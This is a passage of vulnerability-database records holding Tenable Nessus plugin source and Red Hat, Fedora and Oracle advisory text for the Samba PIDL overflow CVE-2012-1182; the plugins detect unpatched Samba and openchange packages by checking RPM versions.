Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=804093\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/080567.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a742831d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"samba4-4.0.0-38.alpha16.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:10:36", "description": "Updated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3\nLong Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended\nUpdate Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. 
A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.", "edition": 21, "published": "2012-04-11T00:00:00", "title": "RHEL 5 / 6 : samba (RHSA-2012:0465)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2012-04-11T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:libsmbclient-devel", "p-cpe:/a:redhat:enterprise_linux:samba-winbind-devel", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:5.3", "p-cpe:/a:redhat:enterprise_linux:samba", "p-cpe:/a:redhat:enterprise_linux:samba-winbind-clients", "cpe:/o:redhat:enterprise_linux:6.1", "p-cpe:/a:redhat:enterprise_linux:samba-common", "p-cpe:/a:redhat:enterprise_linux:libsmbclient", "cpe:/o:redhat:enterprise_linux:5.6", "p-cpe:/a:redhat:enterprise_linux:samba-winbind-krb5-locator", "p-cpe:/a:redhat:enterprise_linux:samba-client", "p-cpe:/a:redhat:enterprise_linux:samba-debuginfo", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:samba-domainjoin-gui", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:samba-swat", 
"p-cpe:/a:redhat:enterprise_linux:samba-winbind", "p-cpe:/a:redhat:enterprise_linux:samba-doc"], "id": "REDHAT-RHSA-2012-0465.NASL", "href": "https://www.tenable.com/plugins/nessus/58672", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0465. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58672);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0465\");\n\n script_name(english:\"RHEL 5 / 6 : samba (RHSA-2012:0465)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3\nLong Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended\nUpdate Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. 
A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1182\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-common\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0465\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"libsmbclient-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", 
reference:\"libsmbclient-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"libsmbclient-devel-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", reference:\"libsmbclient-devel-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba-client-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba-client-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba-client-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"samba-common-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", reference:\"samba-common-3.0.33-3.39.el5_8\")) flag++; }\n\nif 
(sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba-swat-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba-swat-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba-swat-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++; }\n\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"libsmbclient-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"libsmbclient-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"libsmbclient-devel-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"libsmbclient-devel-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", 
reference:\"samba-client-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-client-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-client-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"samba-common-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"samba-common-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"samba-debuginfo-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"samba-debuginfo-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-doc-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-doc-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-doc-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-domainjoin-gui-3.5.6-86.el6_1.5\")) flag++; }\n else { if 
(rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-domainjoin-gui-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-domainjoin-gui-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-swat-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-swat-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-swat-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-winbind-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-winbind-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", 
reference:\"samba-winbind-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"samba-winbind-clients-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"samba-winbind-clients-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"samba-winbind-devel-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"samba-winbind-devel-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-winbind-krb5-locator-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-winbind-krb5-locator-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++; }\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:47:47", "description": "From Red Hat Security 
Advisory 2013:0515 :\n\nUpdated openchange packages that fix one security issue, several bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange\nservers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version\nof PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version, including support for the rebased samba4 packages\nand several API changes. (BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs :\n\n* When the user tried to modify a meeting with one required attendee\nand himself as the organizer, a segmentation fault occurred in the\nmemcpy() function. Consequently, the evolution-data-server application\nterminated unexpectedly with a segmentation fault. This bug has been\nfixed and evolution-data-server no longer crashes in the described\nscenario. (BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages\nwith a large message body or with extensive attachment. This was\ncaused by minor issues in OpenChange's exchange.idl definitions. This\nbug has been fixed and OpenChange now sends extensive messages without\ncomplications. 
(BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated\npackages, which fix these issues and add these enhancements.", "edition": 22, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 6 : openchange (ELSA-2013-0515)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:openchange", "p-cpe:/a:oracle:linux:openchange-client", "p-cpe:/a:oracle:linux:openchange-devel-docs", "p-cpe:/a:oracle:linux:evolution-mapi", "p-cpe:/a:oracle:linux:evolution-mapi-devel", "p-cpe:/a:oracle:linux:openchange-devel"], "id": "ORACLELINUX_ELSA-2013-0515.NASL", "href": "https://www.tenable.com/plugins/nessus/68752", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0515 and \n# Oracle Linux Security Advisory ELSA-2013-0515 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68752);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0515\");\n\n script_name(english:\"Oracle Linux 6 : openchange (ELSA-2013-0515)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:0515 :\n\nUpdated openchange packages that fix one security issue, several bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate 
security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange\nservers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version\nof PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version, including support for the rebased 